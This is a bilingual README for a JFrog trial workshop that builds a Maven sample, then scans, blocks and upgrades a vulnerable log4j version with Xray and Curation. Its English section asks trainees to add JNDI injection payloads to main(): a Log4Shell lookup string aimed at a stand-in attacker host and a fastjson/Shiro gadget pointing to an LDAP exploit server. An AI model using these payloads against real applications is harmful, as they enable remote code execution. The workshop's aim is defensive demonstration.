This repository contains sample projects and customer training workshop materials for the JFrog Platform (Artifactory, Xray, Curation, etc.). It covers building, deploying, and security scanning across technologies such as Maven, Docker, NPM, Go, .NET, and Python.
English
Welcome to the JFrog SaaS Trial Workshop! 🎓
By the end of this workshop, you will be able to:
- Apply for a JFrog SaaS trial and set up your environment (repos, Xray, CLI).
- Clone and configure the Maven sample project and connect it to your Artifactory repos.
- Build and deploy the project using JFrog CLI and publish build info.
- Understand and remediate security vulnerabilities using JFrog Xray (scan, review, block, fix).
| Step | Action |
|---|---|
| 1 | Apply for JFrog SaaS trial; select region (e.g. Singapore/Tokyo). |
| 2 | Clone this repo and go to maven-sample. |
| 3 | Create Maven local/remote/virtual repos in Artifactory. |
| 4 | Enable Xray indexing for the repos and build pattern **/*. |
| 5 | Install & configure JFrog CLI (jf c add), then Maven (jf mvnc). |
| 6 | Build & deploy: jf mvn clean install / jf mvn deploy / jf rt bp. |
| 7 | Verify artifacts and build info in Artifactory. |
| 8 | Review Xray findings, then use Curation to block vulnerable version and fix (e.g. log4j). |
| 9 | Rebuild and confirm the issue is resolved. |
- Install JDK
- Download and install JDK from OpenJDK
- Select JDK 17 (LTS) version
- Choose the appropriate package for your operating system:
- Windows:
.ziparchive - macOS:
.tar.gzarchive
- Windows:
- For Windows:
- Extract the
.zipto a directory likeC:\Program Files\Java\jdk-17
- Extract the
- For macOS:
- Extract the
.tar.gzto/Library/Java/JavaVirtualMachines/
- Extract the
- Open System Properties (Win + S → "Environment Variables")
- Click "Environment Variables" → "New" under System variables
- Set:
Variable name: JAVA_HOME Variable value: C:\Program Files\Java\jdk-17 - In System variables, select "Path" → "Edit"
- Click "New" and add:
%JAVA_HOME%\bin - Click "OK" to save
# Check Java version
java -versionExpected output:
openjdk version "17.0.2" 2022-01-18
OpenJDK Runtime Environment (build 17.0.2+8)
OpenJDK 64-Bit Server VM (build 17.0.2+8, mixed mode, sharing)
1️⃣ Download Maven
- Go to Apache Maven download page
- Download the Binary zip archive (e.g.,
apache-maven-3.6.3-bin.zip) 2️⃣ Extract Maven - Extract the downloaded ZIP file to a directory, e.g.:
C:\Program Files\Apache\Maven - Your Maven folder structure should look like:
C:\Program Files\Apache\Maven\apache-maven-3.6.3
- In System variables, click "New"
- Set:
Variable name: MAVEN_HOME Variable value: C:\Program Files\Apache\Maven\apache-maven-3.6.3 - In "Path" variable, click "Edit"
- Click "New" and add:
%MAVEN_HOME%\bin - Click "OK" on all windows to save
Note: After setting environment variables, you need to open a new Command Prompt for the changes to take effect.
# Open a new Command Prompt and run:
mvn -versionExpected output:
Apache Maven 3.6.3 (...)
Maven home: C:\Program Files\Apache\Maven\apache-maven-3.6.3
Java version: 17.0.2, vendor: Oracle Corporation
Java home: C:\Program Files\Java\jdk-17
Default locale: en_US, platform encoding: UTF-8
OS name: "windows 10", version: "10.0", arch: "amd64", family: "windows"
-
Apply for JFrog SaaS Trial
Select "14-Day Free Trial", it will give you your own JFrog Platform.
-
Select AWS Region
- Choose either AWS Singapore or Tokyo region
- This will provide better network performance for users in Asia
- The region selection is available during the trial signup process
-
You will get an email containing the login credentials for the JFrog platform
git clone https://github.com/JFrogChina/jfrog-poc-samples.git
cd jfrog-poc-samples/maven-sample
- Log in to JFrog SaaS Platform
- Click Quick Repository Creation (top-right)
- Select Maven and create:
- Local Repo:
sample-libs-snapshot-localsample-libs-release-local - Remote Repo:
sample-maven-remote - Virtual Repo:
sample-libs-snapshotsample-libs-release
- Local Repo:
- Go to Administrator -> Xray Settings → Index Resource
- Add to indexed Repository:
- Repositories:
sample-libs-snapshot-localsample-libs-release-local
- Repositories:
- Configure Index Build by Pattern:
- Click Manage builds -> By Pattern
- Input the rule as below:
**/* - Click the + button
- This will scan all builds in the system
-
Configure your environment:
jf c add saas
This command will:
- Add a new JFrog configuration named 'saas'
- Prompt you to enter your JFrog platform details
- Store your credentials securely
- Set up the connection to your JFrog SaaS instance
Follow prompts to enter:
- JFrog Platform URL:
https://<YOUR_DOMAIN>.jfrog.io - username
- password
cd maven-sample
jf mvncThis generates a .jfrog/projects/maven.yaml pointing to your SaaS repositories.
Add the code below into the file DemoApplication.java -> main() under jfrog-poc-samples\maven-sample\src\main\java\com\example\jfrog\demo, to call the log4j vulnerable function.
public static void main(String[] args) {
String payload = "{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\",\"resourceName\":\"ldap://127.0.0.1:1389/Exploit\"}";
JSON jsonObject = JSON.parseObject(payload);
logger.info(jsonObject.toString());
logger.error("${jndi:ldap://somesitehackerofhell.com/z}");
}
jf mvn clean install -f pom.xml --build-name=sample-maven-build --build-number=1
jf mvn deploy --build-name=sample-maven-build --build-number=1
jf rt bp sample-maven-build 1- Check Artifactory → Artifacts for deployed files
- View build info in Builds section
The log4j vulnerability (CVE-2021-44228) is detected because your project uses log4j-core 2.14.0. However, it's only exploitable when:
-
Using vulnerable logging patterns:
// Vulnerable logger.info("${jndi:ldap://malicious-server/exploit}"); // Safe logger.info("User logged in: {}", username);
-
AND when:
- Logging user-controlled input
- Input contains
${jndi:ldap://...}pattern - Application has network access to malicious server
This explains why Xray shows many false positives - vulnerabilities exist in code but aren't exploitable in your use case.
JFrog Advanced Security has identified this log4j package as a true positive. You can view the detailed evidence in the security report.
86% of critical/high vulnerabilities are false positives
-
Create Block Condition:
Administrator → Curation Settings → Create Condition
-
Create Policy:
-
Clean Cache:
rm -rf ~/.m2/repository/org/apache/logging/log4j/*
-
Verify Block:
[main] ERROR org.apache.maven.cli.MavenCli - Failed to execute goal on project app-boot: Could not resolve dependencies for project com.example.jfrog:app-boot:war:1.0.2: Could not transfer artifact org.apache.logging.log4j:log4j-core:jar:2.14.0 from/to artifactory-release (https://demo.jfrogchina.com/artifactory/alex-maven): authorization failed for https://demo.jfrogchina.com/artifactory/alex-maven/org/apache/logging/log4j/log4j-core/2.14.0/log4j-core-2.14.0.jar, status: 403 Forbidden -> [Help 1]
-
Fix: Update log4j Version
<dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.17.1</version> </dependency>
-
Rebuild:
jf mvn clean jf mvn deploy --build-name=sample-maven-build --build-number=2 jf rt bp sample-maven-build 2
The build should be successful and the issue was fixed.
- Analysis of Vulnerability Fixing Trends:
Platform → Xray → Scan List → Builds
The build should complete successfully, confirming that the security issue has been fixed.
Happy building and stay secure! 🚀
繁體中文
歡迎參加 JFrog SaaS 試用工作坊! 🎓
完成本工作坊後,您將能夠:
- 申請 JFrog SaaS 試用並完成環境設置(倉庫、Xray、CLI)。
- 克隆並配置 Maven 示例項目,並連接到您的 Artifactory 倉庫。
- 使用 JFrog CLI 構建、部署項目並發布構建資訊。
- 理解並修復 安全漏洞:使用 JFrog Xray 掃描、審查、阻擋並修復(如 log4j)。
| 步驟 | 操作 |
|---|---|
| 1 | 申請 JFrog SaaS 試用;選擇區域(如新加坡/東京)。 |
| 2 | 克隆本倉庫並進入 maven-sample。 |
| 3 | 在 Artifactory 中建立 Maven 本地/遠程/虛擬倉庫。 |
| 4 | 為倉庫啟用 Xray 索引,並設定構建模式 **/*。 |
| 5 | 安裝並配置 JFrog CLI(jf c add),再配置 Maven(jf mvnc)。 |
| 6 | 構建與部署:jf mvn clean install / jf mvn deploy / jf rt bp。 |
| 7 | 在 Artifactory 中驗證制品與構建資訊。 |
| 8 | 查看 Xray 結果,使用 Curation 阻擋易受攻擊版本並修復(如 log4j)。 |
| 9 | 重新構建並確認問題已解決。 |
- 安裝 JDK
- 從 OpenJDK 下載並安裝 JDK
- 選擇 JDK 17 (LTS) 版本
- 選擇適合您作業系統的套件:
- Windows:
.zip壓縮檔 - macOS:
.tar.gz壓縮檔
- Windows:
- Windows 系統:
- 解壓
.zip到目錄,如C:\Program Files\Java\jdk-17
- 解壓
- macOS 系統:
- 解壓
.tar.gz到/Library/Java/JavaVirtualMachines/
- 解壓
- 打開系統屬性(Win + S → "環境變數")
- 點擊"環境變數" → 在系統變數下點擊"新建"
- 設置:
變數名稱:JAVA_HOME 變數值:C:\Program Files\Java\jdk-17 - 在系統變數中,選擇"Path" → "編輯"
- 點擊"新建"並添加:
%JAVA_HOME%\bin - 點擊"確定"保存
# 檢查 Java 版本
java -version預期輸出:
openjdk version "17.0.2" 2022-01-18
OpenJDK Runtime Environment (build 17.0.2+8)
OpenJDK 64-Bit Server VM (build 17.0.2+8, mixed mode, sharing)
1️⃣ 下載 Maven
- 訪問 Apache Maven 下載頁面
- 下載二進制 zip 檔案(例如:
apache-maven-3.6.3-bin.zip) 2️⃣ 解壓 Maven - 將下載的 ZIP 檔案解壓到目錄,例如:
C:\Program Files\Apache\Maven - 您的 Maven 資料夾結構應該如下:
C:\Program Files\Apache\Maven\apache-maven-3.6.3
- 在系統變數中,點擊"新建"
- 設置:
變數名稱:MAVEN_HOME 變數值:C:\Program Files\Apache\Maven\apache-maven-3.6.3 - 在"Path"變數,點擊"編輯"
- 點擊"新建"並添加:
%MAVEN_HOME%\bin - 點擊所有視窗的"確定"保存
注意: 設置環境變數後,您需要打開新的命令提示字元才能使更改生效。
# 打開新的命令提示字元並運行:
mvn -version預期輸出:
Apache Maven 3.6.3 (...)
Maven home: C:\Program Files\Apache\Maven\apache-maven-3.6.3
Java version: 17.0.2, vendor: Oracle Corporation
Java home: C:\Program Files\Java\jdk-17
Default locale: en_US, platform encoding: UTF-8
OS name: "windows 10", version: "10.0", arch: "amd64", family: "windows"
-
申請 JFrog SaaS 試用
選擇"14 天免費試用",它將為您提供自己的 JFrog 平台。 -
選擇 AWS 區域
- 選擇 AWS 新加坡或東京區域
- 這將為亞洲用戶提供更好的網絡性能
- 區域選擇在試用註冊過程中可用
-
您將收到一封包含 JFrog 平台登入憑證的電子郵件
git clone https://github.com/JFrogChina/jfrog-poc-samples.git
cd jfrog-poc-samples/maven-sample
- 登入 JFrog SaaS 平台
- 點擊快速倉庫創建(右上角)
- 選擇 Maven 並創建:
- 本地倉庫:
sample-libs-snapshot-localsample-libs-release-local - 遠程倉庫:
sample-maven-remote - 虛擬倉庫:
sample-libs-snapshotsample-libs-release
- 本地倉庫:
- 轉到 管理員 -> Xray 設置 → 索引資源
- 添加到索引倉庫:
- 倉庫:
sample-libs-snapshot-localsample-libs-release-local
- 倉庫:
- 配置構建索引模式:
- 點擊 Manage builds -> By Pattern
- 輸入規則如下:
**/* - 點擊 + 按鈕
- 這將掃描系統中的所有構建
-
配置您的環境:
jf c add saas
此命令將:
- 添加一個名為 'saas' 的新 JFrog 配置
- 提示您輸入 JFrog 平台詳細信息
- 安全存儲您的憑證
- 設置與您的 JFrog SaaS 實例的連接
按照提示輸入:
- JFrog 平台 URL:
https://<YOUR_DOMAIN>.jfrog.io - 用戶名
- 密碼
cd maven-sample
jf mvnc這將生成指向您的 SaaS 倉庫的 .jfrog/projects/maven.yaml。
jf mvn clean install -f pom.xml --build-name=sample-maven-build --build-number=1
jf mvn deploy --build-name=sample-maven-build --build-number=1
jf rt bp sample-maven-build 1- 在 Artifactory → Artifacts 中檢查已部署的文件
- 在 Builds 部分查看構建信息
檢測到 log4j 漏洞(CVE-2021-44228)是因為您的項目使用了 log4j-core 2.14.0。但是,只有在以下情況下才會被利用:
-
使用易受攻擊的日誌模式:
// 易受攻擊 logger.info("${jndi:ldap://malicious-server/exploit}"); // 安全 logger.info("User logged in: {}", username);
-
並且當:
- 記錄用戶控制的輸入
- 輸入包含
${jndi:ldap://...}模式 - 應用程序可以訪問惡意服務器
這解釋了為什麼 Xray 顯示許多誤報 - 代碼中存在漏洞,但在您的使用場景中無法被利用。
JFrog 高級安全已將此 log4j 包識別為真實漏洞。您可以在安全報告中查看詳細證據。
86% 的嚴重/高風險漏洞是誤報
-
創建阻止條件:
管理員 → 策展設置 → 創建條件
-
創建策略:
-
清理緩存:
rm -rf ~/.m2/repository/org/apache/logging/log4j/*
-
驗證阻止:
[main] ERROR org.apache.maven.cli.MavenCli - Failed to execute goal on project app-boot: Could not resolve dependencies for project com.example.jfrog:app-boot:war:1.0.2: Could not transfer artifact org.apache.logging.log4j:log4j-core:jar:2.14.0 from/to artifactory-release (https://demo.jfrogchina.com/artifactory/alex-maven): authorization failed for https://demo.jfrogchina.com/artifactory/alex-maven/org/apache/logging/log4j/log4j-core/2.14.0/log4j-core-2.14.0.jar, status: 403 Forbidden -> [Help 1]
-
修復:更新 log4j 版本
<dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.17.1</version> </dependency>
-
重新構建:
jf mvn clean jf mvn deploy --build-name=sample-maven-build --build-number=2 jf rt bp sample-maven-build 2
構建應該成功,問題已修復。
- 漏洞修復趨勢分析:
平台 → Xray → 掃描列表 → 構建
構建應該成功完成,確認安全問題已修復。
祝您構建愉快,保持安全!🚀
| 目錄 | 說明 |
|---|---|
maven-sample |
Maven 構建、部署與 Xray/Curation 演示(本 Workshop 主流程) |
docker-sample |
Docker 鏡像構建與推送到 Artifactory |
npm-sample |
NPM 項目與 JFrog CLI |
go-sample |
Go 模組構建與發布 |
dotnet-sample |
.NET 項目與 Artifactory |
python-sample |
Python/pip 與 PyPI 倉庫 |
Xray-best-practices |
Xray 報告導出、Curation 等最佳實踐 |
oss-governence |
開源包治理與策略 |
azure-devops-integration |
Azure DevOps 與 JFrog 整合 |
cloudbees-jenkins-integration |
Jenkins/CloudBees 與 JFrog 整合 |